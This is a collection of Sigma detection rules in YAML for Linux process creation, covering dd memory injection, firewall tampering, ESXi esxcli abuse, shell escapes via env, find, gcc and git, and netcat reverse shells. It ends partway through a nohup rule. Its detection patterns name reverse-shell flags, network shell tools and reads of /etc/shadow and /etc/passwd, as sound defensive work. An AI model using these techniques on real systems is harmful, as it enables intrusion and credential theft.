FILE: rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml
================================================
title: Potential Linux Process Code Injection Via DD Utility
id: 4cad6c64-d6df-42d6-8dae-eb78defdc415
status: test
description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command.
references:
- https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/
- https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh
author: Joseph Kamau
date: 2023-12-01
tags:
- attack.privilege-escalation
- attack.defense-evasion
- attack.t1055.009
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/dd'
CommandLine|contains|all:
- 'of='
- '/proc/'
- '/mem'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml
================================================
title: Ufw Force Stop Using Ufw-Init
id: 84c9e83c-599a-458a-a0cb-0ecce44e807a
status: test
description: Detects attempts to force stop the ufw using ufw-init
references:
- https://blogs.blackberry.com/
- https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-01-18
tags:
- attack.defense-evasion
- attack.t1562.004
logsource:
product: linux
category: process_creation
detection:
selection_init:
CommandLine|contains|all:
- '-ufw-init'
- 'force-stop'
selection_ufw:
CommandLine|contains|all:
- 'ufw'
- 'disable'
condition: 1 of selection_*
falsepositives:
- Network administrators
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_doas_execution.yml
================================================
title: Linux Doas Tool Execution
id: 067d8238-7127-451c-a9ec-fa78045b618b
status: stable
description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does.
references:
- https://research.splunk.com/endpoint/linux_doas_tool_execution/
- https://www.makeuseof.com/how-to-install-and-use-doas/
author: Sittikorn S, Teoderick Contreras
date: 2022-01-20
tags:
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1548
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/doas'
condition: selection
falsepositives:
- Unlikely
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_env_shell_invocation.yml
================================================
title: Shell Invocation via Env Command - Linux
id: bed978f8-7f3a-432b-82c5-9286a9b3031a
status: test
description: |
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
references:
- https://gtfobins.github.io/gtfobins/env/#shell
- https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/env'
CommandLine|endswith:
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
condition: selection
falsepositives:
- Github operations such as ghe-backup
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml
================================================
title: ESXi Network Configuration Discovery Via ESXCLI
id: 33e814e0-1f00-4e43-9c34-31fb7ae2b174
status: test
description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration.
references:
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html
author: Cedric Maurugeon
date: 2023-09-04
tags:
- attack.discovery
- attack.execution
- attack.t1033
- attack.t1007
- attack.t1059.012
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/esxcli'
CommandLine|contains: 'network'
selection_cli:
CommandLine|contains:
- ' get'
- ' list'
condition: all of selection_*
falsepositives:
- Legitimate administration activities
# Note: level can be reduced to low in some envs
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml
================================================
title: ESXi Admin Permission Assigned To Account Via ESXCLI
id: 9691f58d-92c1-4416-8bf3-2edd753ec9cf
status: test
description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
references:
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-09-04
tags:
- attack.persistence
- attack.execution
- attack.privilege-escalation
- attack.t1059.012
- attack.t1098
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/esxcli'
CommandLine|contains: 'system'
CommandLine|contains|all:
- ' permission '
- ' set'
- 'Admin'
condition: selection
falsepositives:
- Legitimate administration activities
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml
================================================
title: ESXi Storage Information Discovery Via ESXCLI
id: f41dada5-3f56-4232-8503-3fb7f9cf2d60
status: test
description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit.
references:
- https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html
- https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html
author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
date: 2023-09-04
tags:
- attack.discovery
- attack.execution
- attack.t1033
- attack.t1007
- attack.t1059.012
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/esxcli'
CommandLine|contains: 'storage'
selection_cli:
CommandLine|contains:
- ' get'
- ' list'
condition: all of selection_*
falsepositives:
- Legitimate administration activities
# Note: level can be reduced to low in some envs
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml
================================================
title: ESXi Syslog Configuration Change Via ESXCLI
id: 38eb1dbb-011f-40b1-a126-cf03a0210563
status: test
description: Detects changes to the ESXi syslog configuration via "esxcli"
references:
- https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
author: Cedric Maurugeon
date: 2023-09-04
tags:
- attack.defense-evasion
- attack.execution
- attack.t1562.001
- attack.t1562.003
- attack.t1059.012
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/esxcli'
CommandLine|contains|all:
- 'system'
- 'syslog'
- 'config'
CommandLine|contains: ' set'
condition: selection
falsepositives:
- Legitimate administrative activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml
================================================
title: ESXi System Information Discovery Via ESXCLI
id: e80273e1-9faf-40bc-bd85-dbaff104c4e9
status: test
description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc.
references:
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
author: Cedric Maurugeon
date: 2023-09-04
tags:
- attack.discovery
- attack.execution
- attack.t1033
- attack.t1007
- attack.t1059.012
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/esxcli'
CommandLine|contains: 'system'
selection_cli:
CommandLine|contains:
- ' get'
- ' list'
condition: all of selection_*
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml
================================================
title: ESXi Account Creation Via ESXCLI
id: b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db
status: test
description: Detects user account creation on ESXi system via esxcli
references:
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
author: Cedric Maurugeon
date: 2023-08-22
tags:
- attack.persistence
- attack.execution
- attack.t1136
- attack.t1059.012
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/esxcli'
CommandLine|contains|all:
- 'system '
- 'account '
- 'add '
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml
================================================
title: ESXi VM List Discovery Via ESXCLI
id: 5f1573a7-363b-4114-9208-ad7a61de46eb
status: test
description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs.
references:
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html
- https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/
- https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html
author: Cedric Maurugeon
date: 2023-09-04
tags:
- attack.discovery
- attack.execution
- attack.t1033
- attack.t1007
- attack.t1059.012
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/esxcli'
CommandLine|contains: 'vm process'
CommandLine|endswith: ' list'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml
================================================
title: ESXi VM Kill Via ESXCLI
id: 2992ac4d-31e9-4325-99f2-b18a73221bb2
status: test
description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM.
references:
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html
- https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/
- https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html
author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
date: 2023-09-04
tags:
- attack.execution
- attack.impact
- attack.t1059.012
- attack.t1529
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/esxcli'
CommandLine|contains|all:
- 'vm process'
- 'kill'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml
================================================
title: ESXi VSAN Information Discovery Via ESXCLI
id: d54c2f06-aca9-4e2b-81c9-5317858f4b79
status: test
description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide.
references:
- https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html
- https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html
- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html
author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon
date: 2023-09-04
tags:
- attack.discovery
- attack.execution
- attack.t1033
- attack.t1007
- attack.t1059.012
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/esxcli'
CommandLine|contains: 'vsan'
selection_cli:
CommandLine|contains:
- ' get'
- ' list'
condition: all of selection_*
falsepositives:
- Legitimate administration activities
# Note: level can be reduced to low in some envs
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml
================================================
title: File and Directory Discovery - Linux
id: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72
status: test
description: |
Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad
date: 2020-10-19
modified: 2024-12-01
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection_file_with_asterisk:
Image|endswith: '/file'
CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline
selection_recursive_ls:
Image|endswith: '/ls'
CommandLine|contains: '-R'
selection_find_execution:
Image|endswith: '/find'
selection_tree_execution:
Image|endswith: '/tree'
selection_findmnt_execution:
Image|endswith: '/findmnt'
selection_locate_execution:
Image|endswith: '/mlocate'
condition: 1 of selection_*
falsepositives:
- Legitimate activities
level: informational
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_file_deletion.yml
================================================
title: File Deletion
id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57
status: stable
description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md
author: Ömer Günal, oscd.community
date: 2020-10-07
modified: 2022-09-15
tags:
- attack.defense-evasion
- attack.t1070.004
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith:
- '/rm' # covers /rmdir as well
- '/shred'
- '/unlink'
condition: selection
falsepositives:
- Legitimate administration activities
level: informational
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_find_shell_execution.yml
================================================
title: Shell Execution via Find - Linux
id: 6adfbf8f-52be-4444-9bac-81b539624146
status: test
description: |
Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
references:
- https://gtfobins.github.io/gtfobins/find/#shell
- https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/find'
CommandLine|contains|all:
- ' . '
- '-exec'
selection_cli:
CommandLine|contains:
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_flock_shell_execution.yml
================================================
title: Shell Execution via Flock - Linux
id: 4b09c71e-4269-4111-9cdd-107d8867f0cc
status: test
description: |
Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
- https://gtfobins.github.io/gtfobins/flock/#shell
- https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/flock'
CommandLine|contains: ' -u '
selection_cli:
CommandLine|contains:
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_gcc_shell_execution.yml
================================================
title: Shell Execution GCC - Linux
id: 9b5de532-a757-4d70-946c-1f3e44f48b4d
status: test
description: |
Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
- https://gtfobins.github.io/gtfobins/gcc/#shell
- https://gtfobins.github.io/gtfobins/c89/#shell
- https://gtfobins.github.io/gtfobins/c99/#shell
- https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith:
- '/c89'
- '/c99'
- '/gcc'
CommandLine|contains: '-wrapper'
selection_cli:
CommandLine|contains:
- '/bin/bash,-s'
- '/bin/dash,-s'
- '/bin/fish,-s'
- '/bin/sh,-s'
- '/bin/zsh,-s'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_git_shell_execution.yml
================================================
title: Shell Execution via Git - Linux
id: 47b3bbd4-1bf7-48cc-84ab-995362aaa75a
status: test
description: |
Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
- https://gtfobins.github.io/gtfobins/git/#shell
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith: '/git'
ParentCommandLine|contains|all:
- ' -p '
- 'help'
CommandLine|contains:
- 'bash 0<&1'
- 'dash 0<&1'
- 'sh 0<&1'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml
================================================
title: OS Architecture Discovery Via Grep
id: d27ab432-2199-483f-a297-03633c05bae6
status: test
description: |
Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.discovery
- attack.t1082
logsource:
category: process_creation
product: linux
detection:
selection_process:
Image|endswith: '/grep'
selection_architecture:
CommandLine|endswith:
- 'aarch64'
- 'arm'
- 'i386'
- 'i686'
- 'mips'
- 'x86_64'
condition: all of selection_*
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_groupdel.yml
================================================
title: Group Has Been Deleted Via Groupdel
id: 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84
status: test
description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks
references:
- https://linuxize.com/post/how-to-delete-group-in-linux/
- https://www.cyberciti.biz/faq/linux-remove-user-command/
- https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/
- https://linux.die.net/man/8/groupdel
author: Tuan Le (NCSGroup)
date: 2022-12-26
tags:
- attack.impact
- attack.t1531
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/groupdel'
condition: selection
falsepositives:
- Legitimate administrator activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml
================================================
title: Install Root Certificate
id: 78a80655-a51e-4669-bc6b-e9d206a462ee
status: test
description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
author: Ömer Günal, oscd.community
date: 2020-10-05
modified: 2022-07-07
tags:
- attack.defense-evasion
- attack.t1553.004
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith:
- '/update-ca-certificates'
- '/update-ca-trust'
condition: selection
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_install_suspicious_packages.yml
================================================
title: Suspicious Package Installed - Linux
id: 700fb7e8-2981-401c-8430-be58e189e741
status: test
description: Detects installation of suspicious packages using system installation utilities
references:
- https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-03
modified: 2026-01-01
tags:
- attack.defense-evasion
- attack.t1553.004
logsource:
product: linux
category: process_creation
detection:
selection_tool_apt:
Image|endswith:
- '/apt'
- '/apt-get'
CommandLine|contains: 'install'
selection_tool_yum:
Image|endswith: '/yum'
CommandLine|contains:
- 'localinstall'
- 'install'
selection_tool_rpm:
Image|endswith: '/rpm'
CommandLine|contains: '-i'
selection_tool_dpkg:
Image|endswith: '/dpkg'
CommandLine|contains:
- '--install'
- '-i'
selection_keyword:
CommandLine|contains:
# Add more suspicious packages
- 'nmap'
- ' nc'
- 'netcat'
- 'wireshark'
- 'tshark'
- 'openconnect'
- 'proxychains'
- 'socat'
condition: 1 of selection_tool_* and selection_keyword
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml
================================================
title: Flush Iptables Ufw Chain
id: 3be619f4-d9ec-4ea8-a173-18fdd01996ab
status: test
description: Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic
references:
- https://blogs.blackberry.com/
- https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html
- https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-01-18
tags:
- attack.defense-evasion
- attack.t1562.004
logsource:
product: linux
category: process_creation
detection:
selection_img:
Image|endswith:
- '/iptables'
- '/xtables-legacy-multi'
- '/iptables-legacy-multi'
- '/ip6tables'
- '/ip6tables-legacy-multi'
selection_params:
CommandLine|contains:
- '-F'
- '-Z'
- '-X'
selection_ufw:
CommandLine|contains:
- 'ufw-logging-deny'
- 'ufw-logging-allow'
- 'ufw6-logging-deny'
- 'ufw6-logging-allow'
# - 'ufw-reject-output'
# - 'ufw-track-inputt'
condition: all of selection_*
falsepositives:
- Network administrators
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_local_account.yml
================================================
title: Local System Accounts Discovery - Linux
id: b45e3d6f-42c6-47d8-a478-df6bd6cf534c
status: test
description: Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md
- https://my.f5.com/manage/s/article/K589
- https://man.freebsd.org/cgi/man.cgi?pwd_mkdb
author: Alejandro Ortuno, oscd.community, CheraghiMilad
date: 2020-10-08
modified: 2024-12-10
tags:
- attack.discovery
- attack.t1087.001
logsource:
category: process_creation
product: linux
detection:
selection_1:
Image|endswith: '/lastlog'
selection_2:
CommandLine|contains: '''x:0:'''
selection_3:
Image|endswith:
- '/cat'
- '/ed'
- '/head'
- '/more'
- '/nano'
- '/tail'
- '/vi'
- '/vim'
- '/less'
- '/emacs'
- '/sqlite3'
- '/makemap'
CommandLine|contains:
- '/etc/passwd'
- '/etc/shadow'
- '/etc/sudoers'
- '/etc/spwd.db'
- '/etc/pwd.db'
- '/etc/master.passwd'
selection_4:
Image|endswith: '/id'
selection_5:
Image|endswith: '/lsof'
CommandLine|contains: '-u'
condition: 1 of selection*
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_local_groups.yml
================================================
title: Local Groups Discovery - Linux
id: 676381a6-15ca-4d73-a9c8-6a22e970b90d
status: test
description: Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md
author: Ömer Günal, Alejandro Ortuno, oscd.community
date: 2020-10-11
modified: 2025-06-04
tags:
- attack.discovery
- attack.t1069.001
logsource:
category: process_creation
product: linux
detection:
selection_1:
Image|endswith: '/groups'
selection_2:
Image|endswith:
- '/cat'
- '/ed'
- '/head'
- '/less'
- '/more'
- '/nano'
- '/tail'
- '/vi'
- '/vim'
CommandLine|contains: '/etc/group'
condition: 1 of selection_*
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml
================================================
title: Potential GobRAT File Discovery Via Grep
id: e34cfa0c-0a50-4210-9cb3-5632d08eb041
status: test
description: Detects the use of grep to discover specific files created by the GobRAT malware
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.discovery
- attack.t1082
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/grep'
CommandLine|contains:
- 'apached'
- 'frpc'
- 'sshd.sh'
- 'zone.arm'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml
================================================
title: Named Pipe Created Via Mkfifo
id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4
status: test
description: Detects the creation of a new named pipe using the "mkfifo" utility
references:
- https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-16
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/mkfifo'
condition: selection
falsepositives:
- Unknown
level: low
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml
================================================
title: Potentially Suspicious Named Pipe Created Via Mkfifo
id: 999c3b12-0a8c-40b6-8e13-dd7d62b75c7a
related:
- id: 9d779ce8-5256-4b13-8b6f-b91c602b43f4
type: derived
status: test
description: Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location
references:
- https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk
- https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-16
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/mkfifo'
# Note: Add more potentially suspicious locations
CommandLine|contains: ' /tmp/'
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml
================================================
title: Mount Execution With Hidepid Parameter
id: ec52985a-d024-41e3-8ff6-14169039a0b3
status: test
description: Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
references:
- https://blogs.blackberry.com/
- https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/
- https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-01-12
tags:
- attack.credential-access
- attack.defense-evasion
- attack.t1564
logsource:
product: linux
category: process_creation
detection:
selection:
Image|endswith: '/mount'
CommandLine|contains|all:
- 'hidepid=2'
- ' -o '
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml
================================================
title: Potential Netcat Reverse Shell Execution
id: 7f734ed0-4f47-46c0-837f-6ee62505abd9
status: test
description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
- https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
- https://www.infosecademy.com/netcat-reverse-shells/
- https://man7.org/linux/man-pages/man1/ncat.1.html
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-07
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: linux
detection:
selection_nc:
Image|endswith:
- '/nc'
- '/ncat'
selection_flags:
CommandLine|contains:
- ' -c '
- ' -e '
selection_shell:
CommandLine|contains:
- ' ash'
- ' bash'
- ' bsh'
- ' csh'
- ' ksh'
- ' pdksh'
- ' sh'
- ' tcsh'
- '/bin/ash'
- '/bin/bash'
- '/bin/bsh'
- '/bin/csh'
- '/bin/ksh'
- '/bin/pdksh'
- '/bin/sh'
- '/bin/tcsh'
- '/bin/zsh'
- '$IFSash'
- '$IFSbash'
- '$IFSbsh'
- '$IFScsh'
- '$IFSksh'
- '$IFSpdksh'
- '$IFSsh'
- '$IFStcsh'
- '$IFSzsh'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_nice_shell_execution.yml
================================================
title: Shell Execution via Nice - Linux
id: 093d68c7-762a-42f4-9f46-95e79142571a
status: test
description: |
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
references:
- https://gtfobins.github.io/gtfobins/nice/#shell
- https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
- attack.discovery
- attack.t1083
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: '/nice'
CommandLine|endswith:
- '/bin/bash'
- '/bin/dash'
- '/bin/fish'
- '/bin/sh'
- '/bin/zsh'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/process_creation/proc_creation_lnx_nohup.yml
================================================
title: Nohup Execution
id: e4ffe466-6ff8-48d4-94bd-e32d1a6061e2
status: test
description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
references:
- https://gtfobins.github.io/gtfobins/nohup/
- https://en.wikipedia.org/wiki/Nohup
